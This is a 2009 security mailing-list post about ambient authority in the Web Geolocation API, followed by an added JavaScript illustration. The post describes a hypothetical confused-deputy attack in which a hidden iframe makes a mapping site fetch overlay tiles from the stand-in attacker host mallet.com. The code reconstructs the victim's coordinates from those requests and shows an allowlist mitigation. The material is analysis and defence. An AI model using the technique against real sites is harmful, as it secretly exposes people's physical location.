[cap-talk] Ambient authority in the Web Geolocation API
Mark Seaborn
mrs at mythic-beasts.com
Wed Nov 18 23:28:20 PST 2009
On Thu, Oct 29, 2009 at 9:05 PM, I wrote:
> The API appears to introduce a new kind of ambient authority. Tyler
> Close's paper on clickjacking [2] argues that the root cause of the problem
> is use of ambient authority via cookies. Tyler argues that sites should use
> URLs-as-capabilities instead of cookies so that an attacker cannot guess the
> URL of a frame to embed.
>
> Though sites can opt not to use cookies as an implementation strategy, they
> can't opt out of using same-origin authorisation for persistent access to
> geolocation data. I suspect DOM storage [3] has a similar issue.
>
I have been trying to come up with a way that the ambient authority in the
geolocation API might get exploited. I have come up with a hypothetical
example but it might be far-fetched.
Suppose FooMaps.com is a mapping site that allows external sites to provide
custom image-tile overlays. It allows you to specify a base URL for the
image tiles as a URL parameter.
So, for example, you would visit
http://foomaps.com/map.py?overlay=http://bar.com/image.cgi
and the resulting page would create <img> elements linking back to
http://bar.com/image.cgi?x=1234&y=4567
If an attacking page from mallet.com wishes to determine the user's
location, it can create an invisible iframe linking to
http://foomaps.com/map.py?overlay=http://mallet.com/user-id/image.cgi,
and mallet.com can infer the user's location based on the HTTP requests it
receives.
If FooMaps.com requires the user to click on an icon before navigating the
map to the user's current position, the attacker must arrange a clickjacking
to get the user to click on the icon. Otherwise, the attacker's job is
simpler.
I am assuming that the user has previously visited FooMaps.com and has
granted it a persistent authorisation to read geolocation information, and
that this grant causes the browser to fulfill geolocation requests from the
origin FooMaps.com without further user interaction.
The question is, how likely is it that a site would provide a URL parameter
API like this? For example, it appears that Google Maps doesn't do this; it
provides JavaScript for other sites to embed instead. OpenStreetMap has URL
parameters for setting longitude and latitude but not apparently for adding
custom layers.
Is there a deeper reason why sites do not or should not provide a URL
parameter API like this? It seems that this might be covered by the "Don't
Be A Deputy" (DBAD) discipline that Maciej Stachowiak proposed on the
w3.org public-webapps mailing list [1] as a way to avoid the Confused Deputy
problem in the context of CORS. One of the options in DBAD discipline is
"Never make a request to a site on behalf of a different site". Is it
generally understood to be a bad idea to embed URLs in URL parameters in
this way?
Mark
[1] http://lists.w3.org/Archives/Public/public-webapps/2009OctDec/0481.html
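The following is an added example to illustrate the scenario in the message above; it is not code from the original post or from any real mapping site. It models the two halves of the attack: the tile requests that the invisible FooMaps iframe would send to an attacker-chosen overlay base, as received by a server at mallet.com, and a conversion of those tile indices back into coordinates. It then shows one check FooMaps could apply to the overlay parameter so that it does not fetch from an arbitrary origin on the visitor's behalf. The tile numbering (the common "slippy map" Web Mercator scheme), the presence of a zoom parameter z alongside x and y, the hostnames, and the request-log lines are all assumptions of this example, not details from the post.

```javascript
// Added example, not from the original cap-talk post. Assumptions: slippy-map
// tile numbering (2^z tiles per axis at zoom z, Web Mercator), a zoom
// parameter z on each tile request, and a constructed attacker-side log.

// Constructed sample of what mallet.com might log once the hidden FooMaps
// iframe has centred the map on the victim and started fetching overlay tiles.
const CONSTRUCTED_ATTACKER_LOG = [
  "GET /user-id/image.cgi?x=2044&y=1361&z=12 HTTP/1.1",
  "GET /user-id/image.cgi?x=2045&y=1361&z=12 HTTP/1.1",
  "GET /user-id/image.cgi?x=2044&y=1362&z=12 HTTP/1.1",
  "GET /user-id/image.cgi?x=2045&y=1362&z=12 HTTP/1.1",
  "GET /favicon.ico HTTP/1.1", // unrelated request; must be ignored
];

// Extract integer tile indices from one request-log line, or null if the line
// is not a well-formed tile request.
function parseTileRequest(line) {
  const m = /^GET (\S+) HTTP\//.exec(line);
  if (!m) return null;
  const url = new URL(m[1], "http://mallet.example"); // base only resolves the path
  const get = (k) => (url.searchParams.has(k) ? Number(url.searchParams.get(k)) : NaN);
  const x = get("x"), y = get("y"), z = get("z");
  if (![x, y, z].every(Number.isInteger) || z < 0 || z > 30) return null;
  const n = 2 ** z;
  if (x < 0 || x >= n || y < 0 || y >= n) return null;
  return { x, y, z };
}

// Slippy-map tile index -> latitude/longitude of the tile's north-west corner.
function tileToLatLon(x, y, z) {
  const n = 2 ** z;
  const lon = (x / n) * 360 - 180;
  const latRad = Math.atan(Math.sinh(Math.PI * (1 - (2 * y) / n)));
  return { lat: (latRad * 180) / Math.PI, lon };
}

function mostCommon(values) {
  const counts = new Map();
  for (const v of values) counts.set(v, (counts.get(v) || 0) + 1);
  return [...counts.entries()].sort((a, b) => b[1] - a[1])[0][0];
}

// Estimate the centre of the victim's map view from the tiles requested.
// Returns { lat, lon, zoom, tiles } or null if no tile requests were seen.
function estimateLocation(logLines) {
  const tiles = logLines.map(parseTileRequest).filter((t) => t !== null);
  if (tiles.length === 0) return null;
  // One map view fetches tiles at a single zoom level; use the dominant one.
  const zoom = mostCommon(tiles.map((t) => t.z));
  const atZoom = tiles.filter((t) => t.z === zoom);
  const xs = atZoom.map((t) => t.x);
  const ys = atZoom.map((t) => t.y);
  const nw = tileToLatLon(Math.min(...xs), Math.min(...ys), zoom);
  const se = tileToLatLon(Math.max(...xs) + 1, Math.max(...ys) + 1, zoom);
  return {
    lat: (nw.lat + se.lat) / 2,
    lon: (nw.lon + se.lon) / 2,
    zoom,
    tiles: atZoom.length,
  };
}

// FooMaps-side check (an assumed mitigation for this example, not something the
// post prescribes): only build tile <img> URLs from overlay bases whose origin
// is explicitly allowlisted, instead of from any URL found in the query string.
// With this in place, a mallet.com page cannot make FooMaps issue requests to
// mallet.com on the victim's behalf.
function isAllowedOverlay(overlayParam, allowedOrigins) {
  let url;
  try {
    url = new URL(overlayParam); // absolute URLs only; relative or junk throws
  } catch (e) {
    return false;
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;
  return allowedOrigins.includes(url.origin);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("attacker's estimate:", estimateLocation(CONSTRUCTED_ATTACKER_LOG));
  console.log("bar.com overlay allowed:",
    isAllowedOverlay("http://bar.com/image.cgi", ["http://bar.com"]));
  console.log("mallet.com overlay allowed:",
    isAllowedOverlay("http://mallet.com/user-id/image.cgi", ["http://bar.com"]));
}
```

Run with `node` to see the estimate derived from the four constructed tile requests (a point near 51.5 N, 0.26 W at zoom 12, i.e. a few kilometres of precision from a single page load) and the allowlist decision for each overlay base. The point of the allowlist is the DBAD one: the request to the overlay server is made by FooMaps on the visitor's behalf, so FooMaps, not the visitor's query string, has to decide which servers it is willing to act for.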